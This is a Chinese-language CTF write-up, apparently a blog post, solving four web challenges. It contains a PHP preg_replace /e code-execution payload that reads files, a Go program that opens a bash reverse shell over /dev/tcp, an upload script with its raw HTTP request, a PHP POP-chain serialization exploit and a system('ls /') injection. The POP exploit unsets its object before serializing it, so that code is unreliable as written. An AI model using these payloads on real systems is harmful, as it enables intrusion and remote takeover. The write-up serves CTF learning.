WEB
0x01 Web – ezrce
题目
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>钥匙呢?</title>
</head>
<body>
<!--
admin的钥匙被他的机器人抢走了!
-->
<form action="" method="post" name="name">
you name:<input name="name" type="text" value="" />
<input type="submit" value="submit" />
<br/>
</form>
<form action="" method="get" name="key">
your key:<input name="key" type="text" value="" />
<input type="submit" value="submit" />
<br/>
</form>
<?php
error_reporting(0);
include 'waf.php';
header("Content-Type:text/html;charset=utf-8");
echo "你是谁啊哥们?把钥匙给我!!!!<br/>";
$key=$_GET['key'];
$name=$_POST['name'];
$qaq=waf($_POST['qaq']);
if (isset($_GET['key'])){
highlight_file(__FILE__);
}
if (isset($name))
{
echo "你是".$name."大人????<br/>";
$name1=preg_replace('/hahaha/e',$qaq,$name);
echo "骗我的吧,你明明是 >>>>小小".$name1;
}
?>
主要利用点在这 $name1=preg_replace('/hahaha/e',$qaq,$name);
要求post参数qaq和name,get参数key
主要参考文章:https://www.freebuf.com/articles/system/242482.html
文章里讲得很详细了,array_rand()实现随机读取文件
- first payload:
name=hahaha&qaq=readfile(array_rand(array_flip(scandir(getcwd()))));
成功读到waf.php的内容
|\/|\?|\\\\/i", $poc)){ echo "hacker! you die!
"; return "666"; } return $poc; } 骗我的吧,你明明是 >>>>小小300
在原payload基础上修改,
利用三个dirname()返回到根目录,array_rand()实现随机读取
- final payload :
name=hahaha&qaq=readfile(array_rand(array_flip(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))))
随机读取,多点几次就出来了
0x02 WEB - test
查看页面源代码,发现/profile/index这个路由,访问一下返回一个result,试试/profile/admin,返回一个MD5,解密得asdfgh123 , admin登录进去,提示上传个go文件,就会运行,构造一个上传数据包,go文件如下:
package main
import (
"fmt"
"log"
"os/exec"
)
func main() {
cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
out, err := cmd.CombinedOutput()
if err != nil {
fmt.Printf("combined out:\n%s\n", string(out))
log.Fatalf("cmd.Run() failed with %s\n", err)
}
fmt.Printf("combined out:\n%s\n", string(out))
}
上传脚本如下:
import requests
url = 'http://1a059500.clsadp.com/Adm1nUp104d'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36',
'Referer': 'http://1a059500.clsadp.com/'
}
file_path = r'file.go'
with open(file_path, 'rb') as file:
file_data = file.read()
data = {
'file': ('123.go', file_data, 'application/octet-stream'),
'submit': 'submit_file'
}
response = requests.post(url, headers=headers, files=data)
print(response.text)
上传文件请求包如下:
POST /Adm1nUp104d HTTP/1.1
Host: 8e50756d.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://8e50756d.clsadp.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="file"; filename="123.go"
Content-Type: application/octet-stream
package main
import (
"fmt"
"log"
"os/exec"
)
func main() {
cmd := exec.Command("/bin/bash", "-c", "bash -i &> /dev/tcp/ip/port 0>&1")
out, err := cmd.CombinedOutput()
if err != nil {
fmt.Printf("combined out:\n%s\n", string(out))
log.Fatalf("cmd.Run() failed with %s\n", err)
}
fmt.Printf("combined out:\n%s\n", string(out))
}
------WebKitFormBoundarydX4dGEAJZUS6ZqkT
Content-Disposition: form-data; name="submit"
submit_file
------WebKitFormBoundarydX4dGEAJZUS6ZqkT--
0x03 WEB-pop
EXP如下:
<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 1);
class night
{
public $night;
}
class day
{
public $day;
}
class light
{
public $light;
}
class dark
{
public $dark;
}
$a = new night();
$a -> night = new day();
$a -> night -> day = new dark();
$a -> night -> day -> dark = new light();
$a -> night -> day -> dark -> light = new day();
$a -> night -> day -> dark -> light -> day = new dark();
$a -> night -> day -> dark -> light -> day -> dark = 'ls';
unset($a);
echo urlencode(serialize($a))."\n";
$un = '快给我传参pop';
echo urlencode($un);
?>
0x04 WEB - unserialize
直接传参?a=system(“ls /”)
718
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
